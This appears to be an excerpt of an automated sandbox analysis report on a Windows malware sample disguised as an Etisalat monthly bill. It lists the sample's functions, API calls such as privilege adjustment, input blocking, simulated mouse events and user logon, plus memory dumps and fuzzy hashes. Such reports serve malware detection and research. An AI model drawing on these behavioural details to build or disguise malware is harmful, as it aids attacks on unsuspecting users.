                                      • Opcode Fuzzy Hash: 3d1762c4b1a22f1dcb4c0b8d2094e0f3d065b0e8adc59f8e5242861f2194a9c0
                                      • Instruction Fuzzy Hash: 551165716106009FD710EF29D855A2AF7E9FF54324F04855EF9A9DB291DB74AC00CB81
                                      Function 00BCA2D5 Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00BD977D,?,00BEFB84,?), ref: 00BCA302
                                      • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00BD977D,?,00BEFB84,?), ref: 00BCA314
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: ErrorFormatLastMessage
                                      • String ID:
                                      • API String ID: 3479602957-0
                                      • Opcode ID: 10827db9be276f633940fe766f3e65a5ece5a25cc47b2181c2887f5f70553148
                                      • Instruction ID: f213f4d454859a44cca989a3d3336e8951b4614034ef04c41d46b604a251be45
                                      • Opcode Fuzzy Hash: 10827db9be276f633940fe766f3e65a5ece5a25cc47b2181c2887f5f70553148
                                      • Instruction Fuzzy Hash: 9CF0823554426EABDB109FA4CC88FEA77ADFF08761F0041A9B908D7181DA309940CBA1
                                      Function 00BB8713 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                      Download Yara Rule
                                      APIs
                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00BB8851), ref: 00BB8728
                                      • CloseHandle.KERNEL32(?,?,00BB8851), ref: 00BB873A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: AdjustCloseHandlePrivilegesToken
                                      • String ID:
                                      • API String ID: 81990902-0
                                      • Opcode ID: 61750732fb5edabe3af2c81ad387c812a89461f3b4f877496b7903ad430e974a
                                      • Instruction ID: b33298b2ffb599a3640906924e8920156b6e11c9975f2c15424a2d2ef3e91175
                                      • Opcode Fuzzy Hash: 61750732fb5edabe3af2c81ad387c812a89461f3b4f877496b7903ad430e974a
                                      • Instruction Fuzzy Hash: 26E08C32001641EFE7212B24EC08D737BEDEF00350B20887DF49680470CF62AC91DB10
                                      Function 00B8A395 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00B88F97,?,?,?,00000001), ref: 00B8A39A
                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00B8A3A3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled
                                      • String ID:
                                      • API String ID: 3192549508-0
                                      • Opcode ID: 3aaf938aa3f63104c76908bb89ed524427da1ed5f485f2628a6bbf73a858ce51
                                      • Instruction ID: 15dc42f051d38ca57667c2c7edc05b9842097add6d6b2d943441e6a940160836
                                      • Opcode Fuzzy Hash: 3aaf938aa3f63104c76908bb89ed524427da1ed5f485f2628a6bbf73a858ce51
                                      • Instruction Fuzzy Hash: 55B0923105424AABCA002B91EC49BA83F68EB44AA2F404020F60D8A464CF6255508A99
                                      Function 00B8F419 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3cc897c284950be3fc9fa76efe1c2e5cd098db7f178073e390672f4100d12264
                                      • Instruction ID: deda178bd22d463c0275e48691a40f3f3e819143c29af050bfb174972225c267
                                      • Opcode Fuzzy Hash: 3cc897c284950be3fc9fa76efe1c2e5cd098db7f178073e390672f4100d12264
                                      • Instruction Fuzzy Hash: D9320621D69F024DD7236634D872335A289EFB73D4F15D777E819B69A6EF28C5838200
                                      Function 00B9267E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 487d5d2643874c1ccc409281573092f2ddbd15dc6b309ee1d893356e2c7dbfde
                                      • Instruction ID: c91db20c7abac35150fe1d8d27d62faef9ef7599dbdaab4272c77582201d7524
                                      • Opcode Fuzzy Hash: 487d5d2643874c1ccc409281573092f2ddbd15dc6b309ee1d893356e2c7dbfde
                                      • Instruction Fuzzy Hash: 97B11461D2AF414DD72396398871336BB9CAFBB2C5F52D71BFC1A72D22EB2185838141
                                      Function 00BC8B13 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                      Download Yara Rule
                                      APIs
                                      • __time64.LIBCMT ref: 00BC8B25
                                        • Part of subcall function 00B8543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00BC91F8,00000000,?,?,?,?,00BC93A9,00000000,?), ref: 00B85443
                                        • Part of subcall function 00B8543A: __aulldiv.LIBCMT ref: 00B85463
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Time$FileSystem__aulldiv__time64
                                      • String ID:
                                      • API String ID: 2893107130-0
                                      • Opcode ID: d0505d097292e0e8bdff5a931058c7a2179c0f67848ff36920e36cec82d5af33
                                      • Instruction ID: 46ee3684fcf82b0911b6bff6c8b5ae140534875a55ee04f51ed5f03ccb8b6e27
                                      • Opcode Fuzzy Hash: d0505d097292e0e8bdff5a931058c7a2179c0f67848ff36920e36cec82d5af33
                                      • Instruction Fuzzy Hash: DB21D2726355108BC729CF29D841B52B3E1EFA5311B288F6CD0E5CB6D0CA75BD05CB94
                                      Function 00BD41FD Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      • BlockInput.USER32(00000001), ref: 00BD4218
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: BlockInput
                                      • String ID:
                                      • API String ID: 3456056419-0
                                      • Opcode ID: ecb5156981fd5adfe482419f83b331c4aae63f8bbf0e2e9fa3012835b1d5c619
                                      • Instruction ID: db7fb6cb8f73756e3726fb7177f11402c94b0e91f457efe4f4e4d370ab9e9a35
                                      • Opcode Fuzzy Hash: ecb5156981fd5adfe482419f83b331c4aae63f8bbf0e2e9fa3012835b1d5c619
                                      • Instruction Fuzzy Hash: 46E04F312502149FC710EF59D844A9AF7ECEF95760F048066FD49CB352DB74E840CBA0
                                      Function 00BC4EF5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                      Download Yara Rule
                                      APIs
                                      • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00BC4F18
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: mouse_event
                                      • String ID:
                                      • API String ID: 2434400541-0
                                      • Opcode ID: 00c35d28930ad796b4ac59e3be97c9fd7bf6ba467dcdad3e68347613409b6fa1
                                      • Instruction ID: 63e96fead0c8c157a05f84ce3dd1d208187d7ff1f249b298cf55650023b425ea
                                      • Opcode Fuzzy Hash: 00c35d28930ad796b4ac59e3be97c9fd7bf6ba467dcdad3e68347613409b6fa1
                                      • Instruction Fuzzy Hash: AFD05EB016420638FC184B20AC7FF760198E351781F8449CD3209894C2DAE16A00B034
                                      Function 00BB8C93 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                      Download Yara Rule
                                      APIs
                                      • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00BB88D1), ref: 00BB8CB3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: LogonUser
                                      • String ID:
                                      • API String ID: 1244722697-0
                                      • Opcode ID: f4ab297e23130f78a4f317fdd7ead037a64d1796e82258d40cc10c4047c801db
                                      • Instruction ID: e46cb3e58624a859bcdcc341fc384184d10d9768363bb105cf7f47cc6069acd0
                                      • Opcode Fuzzy Hash: f4ab297e23130f78a4f317fdd7ead037a64d1796e82258d40cc10c4047c801db
                                      • Instruction Fuzzy Hash: AED05E3226050EABEF018EA4DC01EBE3B69EB04B01F408111FE15C60A1C775D835AB60
                                      Function 00BA2230 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetUserNameW.ADVAPI32(?,?), ref: 00BA2242
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: NameUser
                                      • String ID:
                                      • API String ID: 2645101109-0
                                      • Opcode ID: 219f2e8691868985cc3769476cf8dfc478fa22c44a9b51c823ed9ccf3be7d287
                                      • Instruction ID: 0fd999a37821b40744be130ba4b05c178508aa2a6ce8c0cff2a57f46ca09a8cc
                                      • Opcode Fuzzy Hash: 219f2e8691868985cc3769476cf8dfc478fa22c44a9b51c823ed9ccf3be7d287
                                      • Instruction Fuzzy Hash: 39C048F180510ADBDB45EFA0DAC8DFEB7BCAB08304F2045A6A102F2141EB749B448A71
                                      Function 00B8A364 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00B8A36A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled
                                      • String ID:
                                      • API String ID: 3192549508-0
                                      • Opcode ID: 77b8098f4260e8a36550b0b2cc9acafd6a9bb812cf387e8317716c550a2fc3c8
                                      • Instruction ID: 03b239acd5e0185db9a0e5037b11fe9dee29eee1f7067cc20c9dc297aacb2581
                                      • Opcode Fuzzy Hash: 77b8098f4260e8a36550b0b2cc9acafd6a9bb812cf387e8317716c550a2fc3c8
                                      • Instruction Fuzzy Hash: 52A0243000010DF7CF001F41FC044547F5CD7001D07004030F40C45031CF33541045C4
                                      Function 00B78A0E Relevance: .6, Instructions: 608COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e670e6e6ee8fc976ae1001050a09f52db38a6a6d082a9e05627b9e350a24afff
                                      • Instruction ID: 27d569ffad13dd7249068987bcb4f0e070c26af95cf34dcb7a18c3bd14024bc3
                                      • Opcode Fuzzy Hash: e670e6e6ee8fc976ae1001050a09f52db38a6a6d082a9e05627b9e350a24afff
                                      • Instruction Fuzzy Hash: B1221770A45615CBDF398B28C5D87BD77E1EB01300F68C4EAD86A9B2D1DB709D81CB62
                                      Function 00B82405 Relevance: .3, Instructions: 345COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                      • Instruction ID: 52ae1d948c3d1533c3f9e1e9306df5e092763b6f0ab5cb7d25f294b418e3dadb
                                      • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                      • Instruction Fuzzy Hash: A5C183362060630ADF1D573D947403EBAE59EA27B131A0BDDE4B2CB5E4EF24D525D720
                                      Function 00B8283A Relevance: .3, Instructions: 341COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                      • Instruction ID: 95a8a2d901b229d62dd9d71ca979631f70ccddf39e96165cae92737b3e23e920
                                      • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                      • Instruction Fuzzy Hash: 42C171322061A309DF6D573D847403EBAE19EA27B131A0BEDE4B2DB5E4EF24D525D720
                                      Function 00B81BB8 Relevance: .3, Instructions: 323COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                      • Instruction ID: 107139c5ae4b49e092656fc82889df30d5e5e32b80fd7987ebc47cb640ed7324
                                      • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                      • Instruction Fuzzy Hash: 50C1933220616309DB2D563D943413EBAE9DAA27B131A0FEDE4B3CB5E4EF14D526D720
                                      Function 015E3670 Relevance: .1, Instructions: 92COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977906262.00000000015E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_15e0000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                      • Instruction ID: a9a117f34dda11cdd9eb2fa9fd5bab97942721e772ebdb8abfe40236103211ff
                                      • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                      • Instruction Fuzzy Hash: EB41C2B1D1051CEBCF48CFADC991AAEBBF2AF88201F548299D516AB345D730AB41DB40
                                      Function 015E3560 Relevance: .0, Instructions: 35COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977906262.00000000015E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_15e0000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                      • Instruction ID: 132e2f194dfa926e0354eb8154aac1542c72e65acade60f2b02be4cb02965af2
                                      • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                      • Instruction Fuzzy Hash: D9019278E00109EFCB88DF98C5949AEF7F5FB88310F60859AD809AB701D730AE41DB80
                                      Function 015E3500 Relevance: .0, Instructions: 35COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977906262.00000000015E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_15e0000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                      • Instruction ID: 38c88639f0157718ab666dc437a12cb3c2bcb8a14c3479aea4985ace0515282f
                                      • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                      • Instruction Fuzzy Hash: B3014278E05109EFCB88DF98C5949AEF7F5FB48310F60859AD919AB741E730AE41DB80
                                      Function 015E1ED0 Relevance: .0, Instructions: 6COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977906262.00000000015E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_15e0000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                      • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                      • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                      • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                      Function 00BE37F3 Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CharUpperBuffW.USER32(?,?,00BEF910), ref: 00BE38AF
                                      • IsWindowVisible.USER32(?), ref: 00BE38D3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: BuffCharUpperVisibleWindow
